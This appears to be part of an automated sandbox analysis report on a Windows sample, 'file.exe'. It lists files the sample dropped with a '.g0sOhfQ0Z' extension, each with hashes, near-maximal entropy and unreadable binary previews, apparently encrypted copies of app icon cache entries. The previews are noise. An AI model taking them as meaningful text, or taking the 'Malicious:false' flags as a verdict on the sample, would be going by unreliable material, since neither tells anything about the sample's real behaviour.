                Preview:Zn...5...[......H.Y#.6=8.S.`...H*D....I...).ljV..i...O....Xkv...!.k...T.!v.,._.....a..of.1.f8...U...V.z....!.z.C'.J.R#.y,...{.&..|.cy.;#......s..........A.$......x........Pa...... .*Sz...].a..L..a_.......jf...L....t,.}#.lWb.CR..s...M.#i.g..Kn..f=...tKO$....T....A....=.9...N....X.Q.<...%R_.t..!.....'w..GD...!4R.(F.Q..y.fR..<b.Dx..v:.R........`0,K.k..4.X....Zs.....@}..h..5k ;.....T....>@......K..?Fr.....>4].VQ...Q.@k..\..sF)R..!.2.....u...2.>.*.]w.Eh....2..........".%..z...:..q..uw=....*........lQ .{..5Pt..N..q.`.`.9._...&......0.GJIZj]f.h.]G4\....k.:...6....,.:.(1f7.Zs....w-!.lw......k.G.p3|R82.}@..vQ...q.T..z.5.:.T.Z+..H...P`I]x.D'.k.S......+..:.ty%~gT....6...-......t.&.]J;3..' m..d...}}.:.l_..~..1.X.[mp........9..(.!Z..1.z..F.% ..Vc.F.j..)..}.....g..a..._..U..Pa.`;g.KM.NW..Zu..u`........4..W....;.YG.).`.....5..f.J..>.Y....f..34.[O...w.^.;v...+.T\>..#.../.....a...!%i5.`'.u1...%)...^..B....FT...K.......C...s.......0..]H.q&.a.q...

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_GetHelp_8wekyb3d8bbwe!App.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):4520
                Entropy (8bit):7.961780625355149
                Encrypted:false
                SSDEEP:96:BpISCnH5mCU4XduqMkKriyT7Y7FA0zIb2eXU2fc66QxSPjv2Q+t2GHezR:QkCU4XU9kKrr748b2eHfccxwjv2Jo
                MD5:8D0DE5AA2794231D5339C60530EBC593
                SHA1:C1859B2F8F10512CD42863355D1529814A6AD70A
                SHA-256:93ED83118D50B060C6416920ED6043989C541D24D7893E00C770EB8B37798FA4
                SHA-512:C9286FA95064F83AF15197E25C6AA0EE57B9E87E135EBD93EF955768625F236D2D933E0FEC2350E07153FECDB807E9E582099B018FCA13C01C36E6EAA8B051A9
                Malicious:false
                Preview:../.Klh$.0. s0Q...j+.,..../QWV6E...s1.q....l_..v...P.WA.)..,#..*.~...N..<2.H.x.....C.z...Uc....|..\y|.T&.)...OAa;b...'Z.........k}..4..N..&#....i.s.H.j.!B....f.0.ct.^....A!=w...}.....U.....P..C..B.=...^(Y,.;.z..y....h.Y.('o..Q.Q....M3.....4..._f..Y.....w\..[....4t..s....._.7.LB.kB.Ym.dh-h............L.-.H......`..p.....l.l...W@....M...8......3...k.P...O..C..xC...*.,...*..z9..zH]9.R..O<..5..e..G.Box0..V..@.t........ .C=..M.:........U".c.iM.kQN..6(.!S.....}..I..g?....rP..{..r..K(....7.b.{......f...!.>.....{*.Ox.G&@.*-....~6.r.X...~...S#Ul..P9.....j....v..D....3.o}.'.t...!..?]....1..8]._...;.'.M.,U.!D..`...........Cj...:.....Q...,..?.9....e......lH.[..,y......$........Y...!...f.>.7.v..G.W.8...D+l`.. ]uR...i.._8..lJ.......)e.......?'....yE.NB.5.*jcZ..8.O.p-..0.QA..6.Y..>.....~......=..k.*q..&....X..AiKq.N&,..!..s..dI0.S....m.'...G......4...Dckr.....m.B.......oN}.......6..0.}.S....,../#8..f..q2....@6....X..y9I..3.B.y....g.Q.9.lv...,1

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_Getstarted_8wekyb3d8bbwe!App.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):4522
                Entropy (8bit):7.962159289428124
                Encrypted:false
                SSDEEP:96:NupdfSLUzLlhtcr4Fa9QQh4SrnIBEUv+u8otZz+JMysfkpnPBcgoj2QE2GHezR:G+MlhWk3Qh4vB5vH8wEK/c1Zcgoj21o
                MD5:28E6F53E0535E5A4A7CD5B5E469486C2
                SHA1:54033E79F6FB303FDAE3A41B38EF060B46A18E53
                SHA-256:1BF778AF46752DC35B2FE3D3C9E17F00825B8EC4699905678AFB6169449C936F
                SHA-512:4C09D5C04697E04A43885904D8651047FBD43F22BE9E7ECC6C8BF4BA7AE867876F48482BB2006983D4EFAB10CBA90D8F10F0086E99A0C290C1E985B57704C889
                Malicious:false
                Preview:.q.R-...i..W>E!....P..9*.........w.........4..M.4Mw.v....9up\.."..h.DQEZ..O./R.L ..../.Z.\.".E%.H.........~.e0..Wd.:.....O..?......}...1.......W.;|.|....G..G.bm.|._.=:*b....d.N.......n.oo7b.nb.p.(...!.~...K.P.....4...SXf.....L....{.A./........iF.jB.<./..v....kr..X.:.D&.4.R7.$GV..VA.L.......8a.>..zz....`D.0u{mk..GU>i..,... &)U.\....b......G.'l.......$..8.u..e{K'Y8.L.@..Y...=..7i&......[r..#.....B........i...+...e..d...&...&0.jyq.%.\..n...-O..kF..?b#~..zk..t.......-..O...'.......4M..8<..$T...]Z.+p..~.D.g8..dj.......=.mF..,p..nP..7.|..s..L........W....2....|.A$'=...-.V..df.h......E.TE3]S..7.....k..)...Iu._...).Q..C>hLi.....7f.sI.O`x....w.I3.t..r....K.`....5H.|f.z.h.n..m...|.j.1u...w..OE..4@..U._......1@u;...w1(.d.c....5.*.uL............?I`.. .=YO.v(....h....D.89.IJ.Crz.....U..9.S.&....c.......t'..o.:U...E....i.i{.u.<....>.Q..Y....WTGi6...I..d..f.d..eD.....o..zSC7m.!..Bn..........ndH.L..b..eV.1.y......<"|.$...oaRc9..3Q.B.,..%..+H.NE...m.*{..Ne?.

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_InternetExplorer_Default.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):4517
                Entropy (8bit):7.957042367330404
                Encrypted:false
                SSDEEP:96:vRn7ytAF3erCsbzPwyVgV1W6kbfRnKXdcIkNIcevvs2QWGO2GHezR:l7mK3eWEV01GJnOTcI/s2Q9Oo
                MD5:B6844293A6E044FBE86978C0436E96C7
                SHA1:062F6254A0AC4FDF6FEC29A0308509D2D36734C4
                SHA-256:BAF076E9EBB1D199ABB3542499924CE53B1AB4E099FF8C614D803398C18D2E57
                SHA-512:41E7608783401ACAA79BB8101D3EBFC7F75284862F2647EFC4AE99680ADD7763849EFE106BBA6A33332FCE5A87C7C2A148A3BE782C7A894FB8F558B77007D3FF
                Malicious:false
                Preview:\>w.D.....8..o.)lWb....t.~y?..=i..-......el,....Z[0...tu.#me....;9\.3;...c...K...r,.9.A.c.s0Pf....u....q...+n..?..9....+......~..[v..4...`.M...F.;.$..z.g..,Am.F.....T.M&i5#.O~pr...<.{......;..A..E.Z..{-$....3..wOm=n.V.X....:$........A..../.(.y.Yzgk.i0....Q..e..99...5.......4R.{..8nyG4.......p.X./t....UV..}.LOR...iS+.o.O.l..ty..I;...t.&Ft..vE.#.v...t?...3r.n......6...S.......K..8jkL7...r...!Uiz...4\.><S.+.p....ECS.....N....N...p{.nL4.......O.7....-.V..`.9.p...8....'R..W.m'.c6.......C.. U.....E.W....60.T@......6!?.o..E.p>J...U".qF...Y'.z....k.8...9'..w..><..|L.!.)..u. ..c.G.Y...)/.M.%.y.Y......T`....0..8=..q..iH~...c....:.w.1m..........Q~.JiU.LR..u.Z..`M.mg+Z&...V.....*.+7...Ap....`..Q.Xn."......N......+S.M$q....Q..'STJ....{,......7......[ghp.X...l ..:,....#..@.....[S.y..=..2..-.....Y..lm....".~.d.K.k[.('......hqp..C.#..L...k...\-3..WA....en[C..L%D4OCn{....!1.j.....Y..}.<...G.S^..(..]-h..2..._k.:..a....^....o.}.... ..`*.L..n73.m.S.D"n[

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_Messaging_8wekyb3d8bbwe!x27e26f40ye031y48a6yb130yd1f20388991ax.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):4565
                Entropy (8bit):7.961291853470259
                Encrypted:false
                SSDEEP:96:8OFYT4KBnIVSfQWLTpBbz3ZH55GzfgrsSJobTjgc5gIT2bfJgIMEzNV2GHezR:8Ek4kn7fQWLVdzR54fgrMTj75DT2NNMZ
                MD5:90939AEE0FF163A649545E27C118C79F
                SHA1:35808D02D5EA48FBB882D5B7CB8281DDA3229FFD
                SHA-256:683F48FB97E7067337BD4836C708BE18EF861079DEEA79EFF6A344F3C5B8C353
                SHA-512:DBCAEE2010B8740043A36BF91CEC5AE4907530FC91C50DC1018782B9A3DB4FAF7A8872BFE9704B8D41FE926E648A49F7936068FF3F0F3F575A839B735CC7B6A6
                Malicious:false
                Preview:2.ZY7^.t....A.....C-t.A.....W.....k`... ..v...*......9..a2."U..*..t{4.:.z........<...C..D.a.y/d..6..&...+y.$...-....%6......P...E.lBF].....`.^..s.d...]..a..B....G.....O..@.:W:.i.[m7ZG...K...`o[.\.".3^...f.Api...~CgTu....Y..|...<l..:.e....t".).A'o/..Z..'...".w1......u...J..........0.:.t|...y...Kj\M.h...(.....2.Y..9.....j..%.3..6$_.....nk....O.q:.F.qP.....;V.w..j3...H....._h....F......wl~...&L.....H....I..F0f.7..x...7..RK...7...W...B..][.&tQ.E.~....["..4......A.@..,vc.j.f... .^..V.u..dN.|...z"=.*.0...4.$.... S......v\..N[ .....o.7.f4.<.4C...;..j..E>.s..0-.i.B...TM......w.H......(.r...'4.[o'.\B!h..O..A..*..Z..Q4.<l...G2......y..!.......x.....a...G...=.[$c.I4wB..c.Yge..8....(...j.61.s..g....R...$....C.7F...#...~.=..P..7..<6w2...f.y.....,.H`...[X...[...>..V..>...M.{...Gc.C...e.._l+..n.T.&.&..j,v.d....s...!..D...u....h^(...x.n<.s^46.]a..vz..o*#.].JI........E.3l....X..y.NQ.>....ik.)J....)r.q...w.#...4.......L...7yp....J.K..B2.z9..\.A.{X.>......

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_Microsoft3DViewer_8wekyb3d8bbwe!Microsoft_Microsoft3DViewer.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):4520
                Entropy (8bit):7.957428513306268
                Encrypted:false
                SSDEEP:96:kptxxTrw+d8EgArbXc2NzLjKnwtnqZo9ViYtZgm9Z4s179ctdNt2GHezR:StE+deKbXljhqm5fTJQXXo
                MD5:59A6AF8BC780A5BCF1F1DAAF6EBE8453
                SHA1:98528FF03CEA87F20A83C8B45175E108D49258DD
                SHA-256:21608A00B20359166E5F95FC1B3E54073CC8A5C12B94A712D6DB2E228DE53BD4
                SHA-512:901DF7B0D1C7A80E0732F99DF93BEE87D4ABCB14D5DAC6255D541E498944493DE1DFE0EA4238CC5059C3ACD2992A8889A79E11C8026F2498B35B2D9AC010671C
                Malicious:false
                Preview:.K.7N..u5;...{a...69.<\.(.4y.....I:H.... .8wH...Pq..N....X"9'(.E...}/.kS...d@G.c.9. .).......<X............W._.G.VXU..&..I!'.L.vR..1...(.5..%......4._.#..t...x.+..tq.t.<0...<.=.x(.}M>.....K....E,. D..].*RB.nphE....w..,..AmO.47f..!..*V.C...~.FrL..[.y...H.r.8.E.>......f.`.=3......+y.^F..eA../*.6..2z*.|....w.A.7."D...>.Q........^.yD(..?..9..../..\..MrBz.... ...GE0../l.....h..'.P.....Q..-..=N.S.~8o...7@.$...*..k.=.7G..j.:.X.D../^T.>.m19B..P..B_..a!.X..Rl...Y-.........".tZ..-.j.5...:.irG../..Mn..elq:8.W...u....w.{T.i.E9..8" (.Vq.Ng,z#..s@.(..{b.kp+.4t.r...Z..g.i..W..oz.&QC.#.uAH...}nZ.].B...m.>B........J{..I....+2!..N........%i.:....(.Y..g~.+...f.. U...p..W......$w%....k...m............gq...|..................x.....8~...p.9.6.._.....a]gp.. 2..,x.......>.?..-....*uV.....i%9..^.F.<.......7...?.M$......b....:-..........O....."l,1..,.}.v.Jv...$..}P..<32.q.....LF.4).......g.2Tx....0....&.Q.e...F.`.z..#...t.......m......w.......Pm.v...!..

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_MicrosoftEdge_8wekyb3d8bbwe!MicrosoftEdge.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):4516
                Entropy (8bit):7.965038463057567
                Encrypted:false
                SSDEEP:96:1POEFn45s24fbw3sq6MxOQifARFYQcJS+ke2tcDn6qPpDTQ4nnH9172GHezR:FOEFn4wbw8q6MxOQiQWtJS+ke2onbVHo
                MD5:30B90FDEC434369F420C973503A82550
                SHA1:4F7E47DA4A1D4187651A019834DA24586F6DDCF4
                SHA-256:70B14F3D2AB0333A72ADC497926BB9038AABBC5651F43A82C79721A8E8DB4AD1
                SHA-512:35068C4CEF0947EFDF08DFE91503A2E45E2DCB6FE08ACAB3DA2392338945BB4337EC2847B88214F9FA1C162A6011BF342AEBD14F9FBE7803925B173E5FEFB9D9
                Malicious:false
                Preview:...aXF_.....6.l.{R.W.56R.......3...v.)F.7..Yw@..jV.e..=>..".*..qio(Z..O.i.IV..r..ba.......Zm.f...t.h.Fg..(.... .D..L..^S..I...c_4...|.D:....C.v......1D=s......*O...X.7.......w....a {..ydq..h..........*`.<..W.?.m}"9.LY.]n;,6.[....O..$gJ......;...).h...b.3.M.:..c-TU.F.L...*.H......r.6..j.{.e..c1..]....3%h.z....2...?........vU.-]...O.~.30 H.Q-*.....>..X..v?.Gh^...'c../.#...u....79..........=..^...i..]2..~.....>....Z.4........>...[......E^.b..Vp.#Y|...|~1..Z.:.n..m.i..e[6Z0...Y..Y..~.=.#.*.?.....jC.....>.....m.A...7m.6.&,....1.t@.l<.(..U...LDV..?....D.x..\x."..[..h.(.+NgB.$.3..E=K.`i..x.....p$..i[C).p .....S_...=.0...,M8.X,.J.....`.............P..PY...@i....=U...(.C.._o@%..&.SVN=6...,W............|+......2\T.SK.H":..?.?..?c..E.#=.@...<w.sKG......tq}.%.f...f.k...2qc...6...~{.d..QV........S...}...k...zs.w....1..1.......V6z........C.......B..z....|@......Y.......Q..L[......(....1.<..:.... fd....YZ^..{.#..Q.+..X.`.jLJ.._.R..w.=c<k.}=j..(......r0......

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_Windows_HolographicFirstRun_cw5n1h2txyewy!App.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):4544
                Entropy (8bit):7.962332945199365
                Encrypted:false
                SSDEEP:96:T9TuAM/hIfSjVVUs0jVVvOGzPvHJ4rQ4DH1OSWq3KfCVa2GHezR:RTu56f0gh7OGTyrh18YKKQo
                MD5:158BEEFCB33FD7853046519D11C6AEB3
                SHA1:91BCDEF3D59448E5CE732EE7128A5607CD469EB4
                SHA-256:828D175264625186788E6FC8EDD417E2C0BFCB69BEA19E3B489BD791468CB49B
                SHA-512:CAB62C5D7C1C72070D93ED6619AD04D4C1A0B8CE3E9B46C26D2056AB20874327C06A60892FEB358B7A95B1973776461F0D880A6190763413399DA0EB2B53AE4D
                Malicious:false
                Preview:#...=.e.^...(....,.....hiJ.4.(s;...r.7.H..\..W.#T.I..u)..df.1.U.?I...d....*....dN.(V.1...u.E..a..X.8F.y=...l....0....hFY.$."..1.hi.....O.A...s....hg........~...b...{.3.Y.]....ll.Nw...J.t..i..-w..Y..v.H].1....ky`...5n~/.*.e"(.]..x.....K5..W.S.T...5..j2".'.....+!.....e=f...tX ...n.,....LZx>........&..\9.0...)...U..\J..w..NkL ...7..%....... .m....,D.~mAU,.p...Nq..z.k.v..T..y..m.@..-D.U/.K....Vf.}w..h....W...m.tk!.._.Q_...I.X..N.xo..t....^.u..F...o...a...........".U....1.wk.^....ld..X.}.._.K.'.s}K..CP'Ny.....o.2~.K...MCD3G.GV.f.k.+.'y._E........r.k.E.h..2.../....#W.a...KZg.c,.H...X.\v..u..a.Q}.kk..Z...U......A..+tf....... ..g.0..~.........q...z3...if.8</..P..J.~.....Ws9..e1..(|.....].........u.f..C....Y.7..V.v....WlO..`..B.p..;..4_.?..%[.i W.~...O.l+..C./!U~....%...:-...T.....{...-.VTU...m-`.i=.......k.O.._...u.....l..a..ZMU..[.n..~..s....4. .$.6$}c.....U|9.I...n..........uZ..Q....?.3t..Wm.B.:[.*..l..=......f..F..;.lk..#B|0

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_Windows_MediaPlayer32.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):4513
                Entropy (8bit):7.954351983377024
                Encrypted:false
                SSDEEP:96:f+aM98u5AkTUo8jVGmo+YLSl4CtwSRmKTxAdICTbrrZcN63aj2GHezR:2auB+kj8JxIy4CtLmKVAdI8+g3Ko
                MD5:31082967B9E8FE38340DB80614E9C5C1
                SHA1:B7D736080886405967CF4B91284C69ADB96D2058
                SHA-256:9C4D53DC06895AD4ADD23B654F6C97031F7C27F5C65405397B530E5B489998F9
                SHA-512:63490CEDA69066FE9ECE0D9CE5F2FF56FF55C2A9D2072D495C649CF44BBE19A78E3293CE2EE47B5674AD5A85C5409AD7BF2BBAC467BD2727B6A3975B3E4DB04C
                Malicious:false
                Preview:..3w.$...M.>..`........Y....~p+...j..A<.:w....[##.D.......[.....k.C!..*.....r...s.]....P'.......A....Q..q$.+Q..<.V.0.....~_..{..].".....*.Y.......rh..#.3g.-..d._1..^....B.5.s..H...F.yR#../..m..D...Wz....l.p.;...R..\.....`Z.m.-5z..eo......6BQ..j].Fs..;h.......!...+..?..!w.u.%..........nH.....k......3..{R....A.Ii.A.T...m]...E.^.....y....}=H..Wu+j|e..zz.....KE?9..m.G.......S....Z.:.*.4...nO....k\.f'.....\.n1;..2..'/a?t....O..{..`...>....?,g.....D....HT.6......]d.\...;.@(..v.i>.M.......G......1.......O.PxQzY..3VT.C.8....~...D..u..?......`H.A*2v..........5..&,..!4.Z.o)....\X.....o.......M..U..x.&*..QH.......n.{6t...48..1..Y.....zj....s..[E.Qd..LPn.E.s........418..CZ7.....<..E ;I_.^j.#...#.....3L...`-.4........p.xmL..c&k2.a.V.x,..|......$;O.......VG.k.F<.....^.~.QQ.D..X.3.J.2^....R.5<......ehU....#=.ISk......KB....y....U%.yRu~?m<..z.P{..%j.<..e3.....vI.,....PK...wm.Ex5P.+:n..c...d.(.h.....S.+..#z.x....9......U..m...#d.....Hc..q...A...zQ...('$l[.-.I..%

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_Windows_Photos_8wekyb3d8bbwe!App.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):4527
                Entropy (8bit):7.953347090289904
                Encrypted:false
                SSDEEP:96:Tm1Ar0K2gBkMvxOqqZdj07DcT0ws9z2IWJZf0r7UnGSSrozOIV2GHezR:KeIKzeYEdgvc4H9z2lN8SSEzTVo
                MD5:722F5C2522F7AE1C2C74E01EE7FDC9D6
                SHA1:69745CBE688905ABDCEA2BA17863F757D4087868
                SHA-256:7F0F063316683C0D877F6F84AD827F19CF62EECCCE4E816AC7CC500DE8B43E57
                SHA-512:B773DEA2FF0893EF3F23A813914A5D09F3AC40D206E6E3414BEAA896EC5AACDF7361B1D34F979C5F4A78AA569F98C3FF1892E2DE2A316CC83EED734737948DC5
                Malicious:false
                Preview:...F..=...OG.s..V~Q]@.....Y..._Ay.+..Bdt...H...6.v..N........1...L4r..&CG..PsXb.....2...rd.}.#..............`.kv.{.^...+..7..0.Q(zz.u. GI....`..'..q.}A.%.l..C@K\..^{.-.w%...i.\t>....]g...2....`....x+Bl....j!.C.S.]K<.Yi...yp\0...1.3n|}..D.+ .Da.w...oLa..k.Y..l.. .".~R....H...9....;.....|6...d....4......Em/..j+.......U..vF.K.!.......%..Z....b.n.XM.*]P^N..F...F....X.}sx..T....V.x...9;.....&....N..i1.;p.....K......t..P.....Q..M..M\x1L....Z2n..M....q.Pp\.".E..&%. ..[...H.*...F.|...[.i..u...3.M.-I..[/...la.=..$..?>.w.....Yr.....G#%~..!'.1..ma...;.%..c-...j.5._....M.S..H...P_...U..u?. ...V.*..M.T.~)...twS5p../.A...RZE..*O.'R...e...D!..; ...C..0.X.(..i.[.?.t....!..........|Z..Hc.....[...v......3......L..g. .)....C%....)..=W..c.,?B?.|...1..3.T...x....Ul!d......... .N....y.^p|/.......1..[T^o.,..h.......[....-....p.....KJ.Z[...}Sr...!.D...C..\..o.&... R.....A......l....z..T...W(..}.....~.z.<R...R...P-.ECF+Ak"...*2.9.2.G..2...G.G.Y4_.s....

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_Windows_RemoteDesktop.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):4513
                Entropy (8bit):7.954339237663998
                Encrypted:false
                SSDEEP:96:c9Bt1NGp7hieONiNaVKyJCC4wepyqJATC+3fQBO6aQ1o335CQvyEZKRO2GHezR:g7w9hVOORi4XbAHfQBO6aQCHvpZKROo
                MD5:EA5456A915B6ED40683A8B5FAF97A363
                SHA1:16A317B2648925E4E3A8F046567BDE22F4DE6C7C
                SHA-256:CCF73EF011C008EF697C4CAB46565B1871F460C3DC94F88F543C2C8F34E94D46
                SHA-512:E1C27680E62931A2531AE89F2943A48C969ECB0A1C30A17A629521003B89B42A65587C905292530644AAA644DE6AC987EC2BC99FBFE06D2AB0F882B48CF7DA10
                Malicious:false
                Preview:D;........F]...H.KL....3F..0.K.#........&.._..pf~.5...5......L..b-T|A.....'..c.@...W......YDO..M.....Q,uj,-q.J^.gR...=7....,....fCk..#..1....2..l{..{5..6...i){.........L<jL.<.\t40U...-..../....L......=Tf....r....Z.k.}{.....@6.zBO.l.=.6.nz.\...E...:.....*.t....7.3......s.K%..k.k..Z...0V.6.YX..?.L(.t).....u[3;.t....FP[...}U.a$.H.vO....*....H......-.x.P...AkO0....2.....o..O.g4.$&^1.6.L.(.....t.X...Zk...XB#.......fb{.....F.F...i.]9..S..'..y...B..g.:\..s....)....s..I!......*..11j0\~.....8......1....|.u5....@..Q+o..S.Vv.....w .`......Iq.M_....@_.W.6.).V.[Ev................e..8..n..5g...).&'+|a.K.t..\.V.d.....7\.....M.....1... ......%.E.....H....%....e.<..~.$......(l.Z.-..6....Yi..x..=..,.s@....Y....n.td X.mb.5.{.i. .....)n.4HS....;}#..o.i.!.V..Q..b.....`0,m`M,..........F.sK8../..1T.M.......2sO.........u.".[,...#J.6...0.+v....7G....."...0A.y......Z.'H.8....a..b..._..1....O...e..E......B.*....z._....D.....5L.!...#...9=".[.v.+..e.......z.z.J..........i.?.

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_Windows_SecHealthUI_cw5n1h2txyewy!SecHealthUI.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):4532
                Entropy (8bit):7.955843144614158
                Encrypted:false
                SSDEEP:96:1RSSaJMcTtm1EDka1aOmpweNlft2lUnrPHqeRqE/Zrx4Tt5BbfGMujbG2GHezR:1l4TygQO8weNptdPqM1/tOTt5dfNumo
                MD5:4A856700999E609BA918DBC045D5F24C
                SHA1:0939E3FDA16A5269833A4A5F57287C957FC73C24
                SHA-256:92611365C014B3A45D55438AB4F1C47B1C586F7E09E852CC1AA411B9F4418631
                SHA-512:EC3B648BCD969D5F4BF138823F35A7E65881DC9DA70DFE47EC81D043C4FFEEF018E0B3FFD089277F24DF4E5780679911905FFE159576B0FEC487D50CB7DACFF4
                Malicious:false
                Preview:Fxk..<T.(.&<.....A.)IB .$Q.f......dj..#...n.Cr.{4.d..Z.=......H.....z.....L......O.?.q.NTh.T...[,.R.m.k..1T7g.H2..f4.h.t....?....U.':@\...&._.......r~.lVS.G.'\^+.....9._.v.:........!Z.7...O.....x,.KM.E...S..K....h.L.....Ml.h..{..'.........JM3....`._..+.z...D...TO..1..'....'.....o..[.W.......B.=.F6{..+..A*P...6P...Cgw.x.FM^A....6.....?...*.{b..&(...T...H,...%....E.O.....^...k.T.....>.z..E!Z.(.1...e..V..6.....a.RMoW?.t,6.S...r.............^..h.w .x\..l_.H...'...9..a._6.........Y@.=......WT..CG....i.v..\....Pkw...S0..#....G.@.m..#.,..'o.P..d..?....7#.0.BJ&.F.....B..1.I....<.T\..]./.2*..v.d.....]oV.f......$3P.B...u.T..H..u......H...1}..&G.......v.g.God..Q~..*.^..J..k.;...S`..B:.N...4_....5t.q...3D.A../3T..].\....::...2.,..........z.......I2aF.Wz.....q....V..*M7../......D.4..$Z....o<.b..V.A.}'W.x>'....$.vd1Z...kf...V....U..[...B?.Z3O..UC.3.........g.C..W6. .W.B.0.dP;..S...6L..e.y....../..b.Z........z..@.'.?AO.`.._.\'.....z.b-.6.....V.Q_..

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_Windows_Shell_RunDialog.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):4517
                Entropy (8bit):7.962034104139366
                Encrypted:false
                SSDEEP:96:O3ig54epUljTJ8OAlSFqYWWS22ky1vcwAxfnroCqQdwTiS2GHezR:O4PxT6LKnv2vAKkmBo
                MD5:557DF735CD416ED7959511498CCCD7AB
                SHA1:7A5F5A9C10FEF05D029731C577BA07E7E8CDD91C
                SHA-256:B52AE49708E6BFA19774C19F15E0F10E441FE86469200B63C416BD3613ECDA05
                SHA-512:E510AD94A2A50FDE2933F45C4A1C29144A7C01AC3DC2FEAC7E0BADC9C7D7DA1C137172C882371F3CB93EC0DE89C6AE8A567BBDBAF4C190F248050BBCADF375A0
                Malicious:false
                Preview:##..(\.+......K..(-... .pN4...S..I.w.g..J.C.#......^.Y..&..5...g.!JR.....g.r.t.>;?>...7:.+T~.|V..5f.u..4ms..r.2.X#8.]...)B...(...+(..{..]........A#.-?...{i@..<..I..8T.k..N,. .....(.Z4.d.:......{,.T...M.}....M...H!..k..e.0.>..c.. .c..w..b........9...?...fSI...Gy.r.{.^...j.U...c.,.;o.zO.^.`.M....b3..&.k...t..9Y...2|.ZS. ..v_...w......x.......04.X?.3....pF.*u..../..H...6.). .(...39T<.c.V....C..O..8..9....qr.................t.....%....t...j..e.v.....NO.i..(..).rvQ.DH0..._h..o5.K....1...u..i.;...:..6...8<.m.U.:>..R.h.U......(2.<..=..E.>l.&.}Ui.....X...G.(hn...7...4........w...'...R..qO5....._.+..D[A/..u...:...s.Z.O....y.....Q.....}j.c.......wBs...u..p.>].....`.......f.z9.C....%..XD..7x.!..M....z..)S>...~..gx...-v*u...T.E.(..W.{..w....-....(^.7.....L...!.(....E..U^Up..S...n.=..ue:*-2....P.j;ny..f(t=..^1..#L;.rl..T....#.m..j.n..H.o.-...U._..N......\...?..X.....)..}..ki..........b..3......B`...b.a.w.*5.....,a>...-...4-....0Pw?..q.Jo.n.M...'...

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_XboxApp_8wekyb3d8bbwe!Microsoft_XboxApp.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):4520
                Entropy (8bit):7.955781207620769
                Encrypted:false
                SSDEEP:96:8H8LJg4aRntidyVhY/ZLJcmrJxPDC9VMw8mImaIczMmJfBpsGGmJVk2R3t2GHezR:8H8LwntiUrYhyQxqMw8mImavzFJJFGm4
                MD5:7FA58532EDDB8788A4AB952BA64AA722
                SHA1:C68581352CDD30F779181279937F6C563E7B3FAF
                SHA-256:D61E26E2486437BC44EE247ADFEFE1DF1F39F2981FC7D3698B47D42F302C4142
                SHA-512:8A125ED76C5FE17A2926AB61514EE7048DE4B47CC5021B41209A79F5E05AEC341E788DE40EAC645AD34C6062D2795C3F70BAC82DE842E86C54AAC8475F4F1B3E
                Malicious:false
